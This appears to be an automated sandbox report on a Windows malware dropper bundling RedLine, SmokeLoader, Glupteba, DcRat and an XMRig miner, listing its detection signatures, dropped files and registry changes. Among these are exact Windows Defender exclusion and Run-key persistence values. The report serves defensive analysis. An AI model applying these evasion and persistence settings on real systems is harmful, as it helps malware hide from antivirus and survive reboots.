Malware Analysis Report

2025-08-06 03:36

Sample ID 230923-x9z2baab4y
Target f6cbadd1b54e99b4555c3db5566df1c4a0fb50ef8b198e020126ce8006dd6b66_JC.exe
SHA256 f6cbadd1b54e99b4555c3db5566df1c4a0fb50ef8b198e020126ce8006dd6b66
Tags
dcrat fabookie glupteba redline smokeloader up3 backdoor google discovery dropper evasion infostealer loader persistence phishing rat spyware stealer trojan healer xmrig trush miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f6cbadd1b54e99b4555c3db5566df1c4a0fb50ef8b198e020126ce8006dd6b66

Threat Level: Known bad

The file f6cbadd1b54e99b4555c3db5566df1c4a0fb50ef8b198e020126ce8006dd6b66_JC.exe was found to be: Known bad.

Malicious Activity Summary

dcrat fabookie glupteba redline smokeloader up3 backdoor google discovery dropper evasion infostealer loader persistence phishing rat spyware stealer trojan healer xmrig trush miner

RedLine payload

Healer

Windows security bypass

SmokeLoader

Glupteba

DcRat

Fabookie

Detected google phishing page

Detects Healer an antivirus disabler dropper

Detect Fabookie payload

RedLine

Modifies Windows Defender Real-time Protection settings

xmrig

Glupteba payload

XMRig Miner payload

Modifies Windows Firewall

Downloads MZ/PE file

Loads dropped DLL

Executes dropped EXE

Windows security modification

Reads user/profile data of web browsers

Uses the VBS compiler for execution

Checks computer location settings

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Suspicious use of SetThreadContext

Checks for VirtualBox DLLs, possible anti-VM trick

Drops file in Program Files directory

Drops file in Windows directory

Unsigned PE

Program crash

Enumerates physical storage devices

Runs net.exe

Modifies data under HKEY_USERS

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Suspicious use of SendNotifyMessage

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

Modifies Internet Explorer settings

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of FindShellTrayWindow

Enumerates system info in registry

Suspicious behavior: MapViewOfSection

Checks SCSI registry key(s)

Suspicious behavior: LoadsDriver

Suspicious behavior: EnumeratesProcesses

Modifies system certificate store

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-09-23 19:33

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-09-23 19:33

Reported

2023-09-23 19:36

Platform

win7-20230831-en

Max time kernel

150s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\f6cbadd1b54e99b4555c3db5566df1c4a0fb50ef8b198e020126ce8006dd6b66_JC.exe"

Signatures

DcRat

rat infostealer dcrat
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\f6cbadd1b54e99b4555c3db5566df1c4a0fb50ef8b198e020126ce8006dd6b66_JC.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detected google phishing page

phishing google

Fabookie

spyware stealer fabookie

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f6cbadd1b54e99b4555c3db5566df1c4a0fb50ef8b198e020126ce8006dd6b66_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v8598647.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v8598647.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v2484984.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v2484984.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v2484984.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5043.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5043.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5043.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5043.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5043.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5043.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5043.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kos1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\set16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\set16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\set16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kos1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\set16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-9O3R8.tmp\is-AOGQ0.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-9O3R8.tmp\is-AOGQ0.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-9O3R8.tmp\is-AOGQ0.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-9O3R8.tmp\is-AOGQ0.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5D03.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5D03.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-9O3R8.tmp\is-AOGQ0.tmp N/A
N/A N/A C:\Program Files (x86)\PA Previewer\previewer.exe N/A
N/A N/A C:\Program Files (x86)\PA Previewer\previewer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-9O3R8.tmp\is-AOGQ0.tmp N/A
N/A N/A C:\Program Files (x86)\PA Previewer\previewer.exe N/A
N/A N/A C:\Program Files (x86)\PA Previewer\previewer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A

Reads user/profile data of web browsers

spyware stealer

Uses the VBS compiler for execution

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\f6cbadd1b54e99b4555c3db5566df1c4a0fb50ef8b198e020126ce8006dd6b66_JC.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v8598647.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v2484984.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Checks installed software on the system

discovery

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\PA Previewer\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-9O3R8.tmp\is-AOGQ0.tmp N/A
File opened for modification C:\Program Files (x86)\PA Previewer\previewer.exe C:\Users\Admin\AppData\Local\Temp\is-9O3R8.tmp\is-AOGQ0.tmp N/A
File created C:\Program Files (x86)\PA Previewer\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-9O3R8.tmp\is-AOGQ0.tmp N/A
File created C:\Program Files (x86)\PA Previewer\is-M8638.tmp C:\Users\Admin\AppData\Local\Temp\is-9O3R8.tmp\is-AOGQ0.tmp N/A
File created C:\Program Files (x86)\PA Previewer\is-PDDBF.tmp C:\Users\Admin\AppData\Local\Temp\is-9O3R8.tmp\is-AOGQ0.tmp N/A
File created C:\Program Files (x86)\PA Previewer\is-GSP9N.tmp C:\Users\Admin\AppData\Local\Temp\is-9O3R8.tmp\is-AOGQ0.tmp N/A
File created C:\Program Files (x86)\PA Previewer\is-TH3B7.tmp C:\Users\Admin\AppData\Local\Temp\is-9O3R8.tmp\is-AOGQ0.tmp N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Logs\CBS\CbsPersist_20230923193535.cab C:\Windows\system32\makecab.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{4AE29AF1-5A48-11EE-829B-7AF708EF84A9} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{4AC3A911-5A48-11EE-829B-7AF708EF84A9} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002bccc567d90a0b479b49b1b2d43318c300000000020000000000106600000001000020000000e220f2a0f31d8c92d89227eecbc0cb4879139fbcada3dd8027b0d8670015b67d000000000e800000000200002000000028851e51f27af33c8887d3ace0b1a98d1c0b860f3d35e755e0befff6bc87f341200000006596cd58d5ee65c15f8193de4ba9ad80fd355627b10864a57e39ee3d446baaa8400000007745cb55c8585174b7ab72a2efb097b4338584ff6b34adfb186bb65052df4fe61894d53ff6173e6121327de11dcf36dfff1d51eac2933f76a93dbf07750b7079 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "402262678" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002bccc567d90a0b479b49b1b2d43318c3000000000200000000001066000000010000200000006abed79271ea597affc697014cd39eee947b7074b6df83662f698ee7841f7718000000000e8000000002000020000000f1157bef41e8736fdcb99eeb5beb739f35bf637bdb3082b490bddaf4121da52090000000cb1b3393f33eb8765118ec3857850bb5cc509feb21c072264ce09744e4f3c43700de71dcaabc586b14662a989f1a4ee505700b0a6e4898f665139ec6f5359a36b72ee2346579b839e07068bd3ef40fb10e79dff6d6c9291778b12bc0fab4d3683d9b6c01200b6acd2686b3b2f395de023f2d0dbe416cd57348cb6f13c26aaf742bb2e60392c99e94e2d96135ef136998400000004ff6af8e613f35c85f4cac15b8550a97e8b581726b76ed42132a3cc63cba2234ae2073779570fb995a92a16154b70052030fce7e9500aa7daa6fc25524604a83 C:\Program Files\Internet Explorer\iexplore.exe N/A
